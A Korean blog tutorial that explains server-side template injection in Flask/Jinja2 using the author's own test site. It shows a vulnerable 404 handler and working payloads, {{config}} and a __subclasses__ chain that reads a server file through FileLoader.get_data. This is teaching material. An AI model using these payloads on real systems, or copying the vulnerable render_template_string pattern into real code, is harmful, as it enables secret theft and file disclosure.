SSTI 기본 개념과 예제 실습

SSTI(Server Side Template Injection)취약점

공격 코드가 웹 템플릿에 포함된 상태에서 서버 측에서 템플릿 인젝션이 발현되는 공격을 의미합니다. 

앞서, 템플릿 엔진에 대한 이야기를 해봅시다.

 

웹 템플릿 엔진은 웹페이지 속 고정적으로 사용되는 부분을 템플릿으로 미리 작성해 두고,

동적으로 변경되는 데이터 영역을 결합하여 웹 문서를 구성하고 화면에 출력하게 합니다.

 

아래 사진은 제가 미리 구축해둔 시험 환경입니다.

img_1 main page template

 

 

메인 페이지 속 배경에 같은 영상이 깔려있습니다.

이렇게 동일한, 중복된 부분을 미리 템플릿으로 만들어놓으면 소스코드를 좀 더 효율적으로 관리할 수 있습니다.

 

{% with messages = get_flashed_messages() %}
    {% if messages %}
        <script>
            alert("{{ messages[-1] }}");
        </script>
    {% endif %}
{% endwith %}

<!DOCTYPE html>
<html lang="en">
<head>
    {% block head %}
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>{% block title %}{% endblock %} - My Webpage</title>
    {% endblock %}
</head>
<body>
    <iframe src="https://www.youtube.com/embed/93M1QtYDtpU?autoplay=1&mute=1&loop=1&control=0&playlist=93M1QtYDtpU&controls=0" \
            title="A$AP ROCKY X TYLER THE CREATOR - POTATO SALAD" class="back_youtube" \
            frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; web-share" \
            allowfullscreen>
    </iframe>
    
    {% block content %}
    {% endblock %}
</body>
</html>

 

 

위 소스코드를 보면, {% block head %}{% endblock %} 부분과  {% block content %}{% endblock %} 부분이 있습니다.

이렇게, 바뀌는 부분을 제외한 반복되는 부분을 템플릿으로 만들어 놓는다면, 더욱 수훨하고 일관성있게 소스를 관리할 수 있습니다.

 

 

다시 본론으로 돌아와서, 위와 같이 템플릿 구문을 사용자가 입력할 수 있다면 서버는 이를 정상적으로 처리할 것입니다.

여기서 SSTI(Server Side Template Injection)가 발생합니다.

 

 

img_2 ssti flow

 

img_2를 보면 서버 측에 Template이 구성되어 있고, 공격자가  ms코드에 {{ 7*7 }}라는 Template 구문을 입력하면

서버측에서 실행되는 과정을 확인할 수 있습니다.

 

 

또한 문법은 Template Engine마다 차이가 있습니다.

${ ... }

{{ ... }}

<%= %>

...

img_3 template engines

 

 

 

이러한 SSTI는 Server Side의 취약점 공격(RCE, SSRF)으로 이어질 수 있어 위험도가 높습니다.

이번 포스팅에서는 여러 Engines중 제 실습 환경에서도 사용한 'Jinja Template'에 관해 진행해 볼 것입니다.

 

 

우선, 제 웹속 취약한 페이지는 바로 오류 페이지입니다.

요청시 오류가 나는 상황을 따로 처리하여 리턴시켰는데, 코드는 아래와 같습니다.

@app.errorhandler(404)
def page_not_found(e):
    if session:
        name = session['name']
        html = '''
            해당 페이지를 찾을 수 없습니다 %s님.
        ''' % name
        return render_template_string(html), 404
    
    else:
        html = '''
            404 페이지를 찾을 수 없습니다.
        '''
        return render_template_string(html), 404

 

 

 

취약점은 위 render_template_string 함수에서 발생합니다.

session이 존재할 경우를 보면 변수 html에 메시지와 사용자 이름을 입력받습니다.

그리고 이 변수는 렌더링되어 사용자에게 보여지게 됩니다.

 

 

여기서 만약, 사용자 이름을 Template 구문으로 만들었다면 SSTI 되는 것입니다.

아래 그림으로 확인해 보겠습니다.

 

img_4 ssti with userName

 

 

사용자 이름을 {{ 7*7 }}로 했더니 연산이 실행되어 49라고 나옵니다.

 

기본적으로 flask의 경우 app에 들어가는 대부분의 정보들이 config 클래스에 들어있습니다.

한번 {{ config }}로 이름을 넣어볼까요?

img_5 flask 속 민감한 정보들

 

 

img_5를 보면, 실제 서버에서 사용되는 중요한 정보들이 나타났습니다.

 

 

이뿐만 아니라, RCE(Remote Code Execute)와 연계하여 시스템에 접근하여 명령어를 실행 할 수 있습니다.

jinja 에서의 ssti와 RCE의 연계를 위해선 sandbox로부터 벗어나, python코드를 실행시킬 방법을 찾아야 합니다.

이를 위해서 오브젝트들을 사용할건데, 해당 오브젝트들은 샌드박스 환경에서는 벗어나 있지만 접근은 가능해야 합니다.

 

 

이해가 잘 안된다구요?

예를 하나 들어보겠습니다.

 

render_template("ch4n.html", UserId=UserId, UserName=UserName)

위 코드에서 UserId와 UserName이란 objects는 non-sandboxed 환경이지만, sandboxed 환경에서 접근이 가능합니다.

그리고 어떠한 sandbox환경에서도 접근 가능한 objects는 아래와 같습니다.

[]
''
()
dict
config
request

 

 

이러한 objects로부터 우리는 <class 'object'>라는 클래스에 접근해야 합니다.

<class 'object'>의 __subclasses__라는 메서드를 통해 os와 같은 non-sandboxed class들을 불러올 수 있기 때문입니다.

 

 

 

자 이를 이용해 직접 서버의 파일을 읽어오는 공격을 해봅시다.

우리가 진행시킬 큰 흐름은 다음과 같습니다.

 

img_6 attack flow

 

 

파일을 읽어오기 위해 사용할 class를 탐색해 봅시다.

 

 

 

{{ ''.__class__ }}

해당 페이지를 찾을 수 없습니다 <class 'str'>님.

 

__class__ 매서드는 해당 오브젝트의 클래스를 보여줍니다.

 

 

 

 

 

{{ ''.__class__.__mro__ }}

해당 페이지를 찾을 수 없습니다 (<class 'str'>, <class 'object'>)님.

 

__mro__ 매서드는 부모 클래스들을 튜블로 반환해 줍니다.

반환 값중 두 번째에 <class 'object'>가 있음을 확인할 수 있습니다.

 

 

 

 

 

{{ ''.__class__.__mro__[1].__subclasses__() }}

해당 페이지를 찾을 수 없습니다 [<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>,

...

 <class 'jinja2.ext.Extension'>, <class 'jinja2.ext._CommentFinder'>]님.

 

__subclasses__ 매서드를 통해 접근 가능한 수백가지의 클래스들을 확인할 수 있습니다. 이중 우리가 사용할 클래스는 파일 입출력 관련 함수가 있는 <class '_frozen_importlib_external.FileLoader'> 입니다.

index가 91이니, __subclasses__()[91]로 클래스에 접근할 수 있습니다.

img_7 classes

 

 

 

 

<class '_frozen_importlib_external.FileLoader'>에 관해 자세한 설명을 해보자면

python이 기본적으로 작동하기 위해 필요한 클래스로, 구체적으론 import를 구현하는 구성 요소입니다.

클래스 맨 앞 _frozen_은 쉽게 말해 Unix system을 위한 python 컴파일 유틸리티라 보면 됩니다.

https://wiki.python.org/moin/Freeze

Freeze - Python Wiki

 

 

 

FileLoader는 filename과 path라는 두 가지의 인자를 받습니다.

또한, get_data라는 함수를 가지는데 해당 함수는 path인자를 받아 바이너리 파일로 읽고 바이트열을 반환해줍니다.

쉽게 말해, 파일을 읽어주는 역할을 수행할 수 있습니다.

https://docs.python.org/ko/dev/library/importlib.html#importlib.abc.FileLoader

importlib — The implementation of import

 

 

 

아래 코드는 importlib속 FileLoader클래스 입니다.

class FileLoader:

...

    def get_data(self, path):
            """Return the data from path as raw bytes."""
            if isinstance(self, (SourceLoader, ExtensionFileLoader)):
                with _io.open_code(str(path)) as file:
                    return file.read()
            else:
                with _io.FileIO(path, 'r') as file:
                    return file.read()
                
...

https://github.com/python/cpython/blob/d4cea794a7b9b745817d2bd982d35412aef04710/Lib/importlib/_bootstrap_external.py#L1161C12-L1161C12

 

 

 

우리는 지금 서버에 미리 저장해 둔 /secret 파일을 읽어올 것입니다.

코드는 ...('secret','/secret').get_data('/secret') 과같이 작성해야겠죠?

 

 

 

 

 

 

{{ ''.__class__.__mro__[1].__subclasses__()[91]('secret','/secret').get_data('/secret') }}

 

이제 해당 payload로 이름을 바꿔보고 확인해 봅시다.

img_8 read server file

 

 

성공적으로 서버 속 파일을 읽어왔습니다.

 

 

 

이처럼 ssti는 server side 무서운 공격들로 이어질 수 있습니다.

최대한의 이해를 돕기 위해 제가 찾아갔던 루트를 그대로 따라가다보니,

깊은 부분까지 가게 되었습니다.

 

이상 이번 포스팅을 마치겠습니다.